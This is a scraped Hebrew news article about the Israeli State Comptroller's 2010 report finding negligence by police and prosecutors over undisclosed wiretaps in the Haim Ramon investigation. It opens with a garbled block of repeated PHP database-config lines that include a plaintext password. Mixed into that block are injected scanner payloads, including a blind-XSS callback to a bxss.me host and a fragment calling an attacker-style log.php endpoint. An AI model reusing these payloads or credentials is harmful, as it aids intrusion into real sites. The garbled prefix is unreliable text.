$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> מבקר המדינה: ליקויים בביצוע האזנות סתר בחקירת חיים רמון
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מבקר המדינה: רשלנות ממשית בהאזנות סתר בחקירת חיים רמון

תאריך: 02/08/2010 14:52   מחבר: מערכת האתר

התלונה של חיים רמון

ביולי 2008, בעקבות החלטת הממשלה, פנה מר חיים רמון למבקר המדינה וביקש כי יבדוק את תפקודן של המשטרה והפרקליטות בנוגע להאזנות סתר שבוצעו בשנת 2006 במסגרת חקירה פלילית נגדו. מר רמון צירף לפנייתו מכתב המפרט את עיקרי תלונתו, ובו נטען כי בשלב מאוחר יחסית של משפטו התברר באקראי להגנה, בעקבות מידע שמסר מקור אנונימי, כי במהלך החקירה בוצעו האזנות סתר שדבר קיומן הוסתר מעיני ההגנה.

עוד הוסיף לטעון מר רמון במכתבו כי ארבע פניות דחופות ורצופות, שנעשו לפרקליטות במטרה לברר את הנושא, נענו בהכחשה גורפת אודות דבר קיומן של האזנות סתר. עוד טען מר רמון כי אף שבית המשפט קבע כי האירועים שבהם עוסקת תלונתו היו בבחינת רשלנות ממשית, איש במערכת לא נתן על כך את הדין. צוות בדיקה מטעם מבקר המדינה ישב על המדוכה לבדיקת הטענות שהועלו. בחודש יוני 2010 פרסם המבקר את ממצאי בדיקותיו.

לפי הפרסום בעיתון "הארץ" מחודש יוני 2010 שר המשפטים לשעבר, דניאל פרידמן, ביקש מהשופט בדימוס, ורדי זיילר, לבדוק מחדש את הפרשה. זיילר קבע כי "רשלנותה של הפרקליטות מבוססת על עובדות והיא נתמכת ב'הודאות' אנשי הפרקליטות ש'הכו על חטא', הודו בטעותם וברשלנותם ואף הביעו צער וחרטה".

זיילר המליץ לפרידמן להקים ועדת בדיקה ממשלתית לבדוק אם החומרים לא הועלמו מתוך אינטרסים זרים. ועדה זו לא הוקמה בסופו של דבר, ובמקומה הורתה הממשלה על בדיקת המבקר.

דוח המבקר

מבקר המדינה, מיכה לינדנשטראוס, פרסם דו"ח חריף נגד התנהלות הפרקליטות והמשטרה ב"פרשת הנשיקה" של השר לשעבר חיים רמון. בין היתר מצא המבקר ליקויים משמעותיים בכל הנוגע לטיפול בהאזנות הסתר בתיק, שמקורם בכשלים אישיים של ארבעת הממונים על החקירה: ראש יאח"ה לשעבר תת-ניצב בדימוס מירי גולן, ראש צוות החקירה סגן-ניצב ערן קמין, פרקליטת מחוז תל אביב רות דוד, וכן הפרקליטה הבכירה שניהלה את התיק בבית המשפט, אריאלה סגל-אנטלר.

המבקר קובע בחוות דעתו כי היו בפעולות המעורבים בפרשה ליקויים משמעותיים ולכן קרתה התקלה החמורה. כל המעורבים פעלו בניגוד לכללים המחייבים: הממונים על החקירה לא וידאו כי תוצרי האזנות הסתר יתומללו או יתוקצרו ויועברו לעיון הפרקליטוּת המלווה את התיק.

הפרקליטות לא עיינו בכל חומר החקירה לרבות החומר המודיעיני לפני הגשת כתב האישום ולפני תחילת המשפט. תקלות אלה מצביעות, לטענת המבקר,  על כשלים אישיים של ארבעת המעורבים העולים כדי רשלנות ממשית אף כי הדברים נעשו בלא זדון, ויש לשקול אם יש להסיק מסקנות אישיות כלפיהם.

לדעת המבקר, על היועץ המשפטי לממשלה לבחון את עמדתו בָּעניין בשים לב למכלול הגורמים הרלוונטיים ולסעיפי החוק הנוגעים בדבר, לרבות הטענות שהועלו בפניו בדבר היבטים הקשורים בתקופת ההתיישנות הקבועה בדיני המשמעת. בעת הבחינה, קובע המבקר, יש להביא בחשבון שיקולים חשובים נוספים, ובהם תרומתם ארוכת השנים של המעורבים בעניין למאבק בפשיעה ולאכיפת החוק.

מכול מקום יש להתייחס למעשיו של כל אחד מהם בנפרד. הדוח על ממצאיו החמורים הועבר לעיון היועץ המשפטי לממשלה. 

עתירה לבג"ץ

בעקבות הביקורת החריפה עתרו הפרקליטות המבוקרות רות דוד וסגל אנטלר לבג"ץ נגד מבקר המדינה כי מצאו ליקויים בעבודת הביקורת.

העתירה טרם נדונה. לאחר בירורה בבג"ץ נדווח לכם על תוצאותיה.